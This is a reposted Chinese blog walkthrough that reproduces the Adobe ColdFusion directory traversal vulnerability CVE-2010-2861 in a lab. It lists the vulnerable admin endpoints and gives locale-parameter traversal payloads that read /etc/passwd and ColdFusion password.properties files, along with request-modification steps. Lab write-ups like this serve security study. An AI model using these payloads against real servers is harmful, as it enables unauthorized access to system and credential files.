Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)

本文阅读 2 分钟

Adobe ColdFusion是JJ Allaire 于 1995 年创建的商业快速Web应用程序开发计算平台。其运行的CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。5.0以后,cfm文件被编译器翻译为对应的 c++ 语言程序,然后运行并向浏览器返回结果。

漏洞版本:9.0.1版本及之前版本
漏洞危害:
远程攻击者可以通过以下接口设置locale参数来读取任意文件:
1、CFIDE/administrator/settings/mappings.cfm
2、logging/settings.cfm 
3、datasources/index.cfm
4、j2eepackaging/editarchive.cfm
5、CFIDE/administrator/enter.cfm

1、环境

访问ip:port/CFIDE/administrator/enter.cfm进入初始化页面,输入密码admin初始化服务器。 img 初始化后页面如下: img

2、Payload

此次漏洞没有做任何的校验,重点是找到接口位置,以及更改local参数。
部分payload如下:
locale=../../../../../../../etc/passwd%00en
locale=../../../../../../../lib/password.properties%00en
locale=../../../../../../../servers/cfusion/cfusion-ear/cfusion-war/WEB-INF/cfusion/lib/password.properties%00en

1、logging/settings.cfm

1.1、接口位置 img

1.2、修改请求包 img

2、datasources/index.cfm

2.1、接口位置 img 2.2、抓取请求包 img

2.3、修改请求包 img

3、j2eepackaging/editarchive.cfm

3.1、接口位置 img

3.2、抓取请求包 img

3.3、修改请求包locale参数,读取/etc/passwd img

4、CFIDE/administrator/settings/mappings.cfm

4.1、接口位置 img 4.2、抓取请求包 img

4.3、修改请求包 在这个接口,没有找到含有locale参数的get或者post请求包,所以构造locale参数,添加&locale=../../../../../../../../../../etc/passwd%00en img

5、CFIDE/administrator/enter.cfm

5.1、退出登录,使用admin/admin登陆时抓取请求包 img

5.2、抓取请求包 img

5.3、修改请求包 在这个接口,没有找到含有locale参数的get或者post请求包,所以构造locale参数,添加&locale=../../../../../../../../../../etc/passwd%00en img

1、路径后不跟参数值,失败。

img

2、路径后参数值为数字,成功。

img

3、路径后参数值为字母,成功。

img

4、路径后参数值为特殊符号,成功。

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/sycamorelg/article/details/118219714
-- 展开阅读全文 --
Web安全—逻辑越权漏洞(BAC)
« 上一篇 03-13
Redis底层数据结构--简单动态字符串
下一篇 » 04-10

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复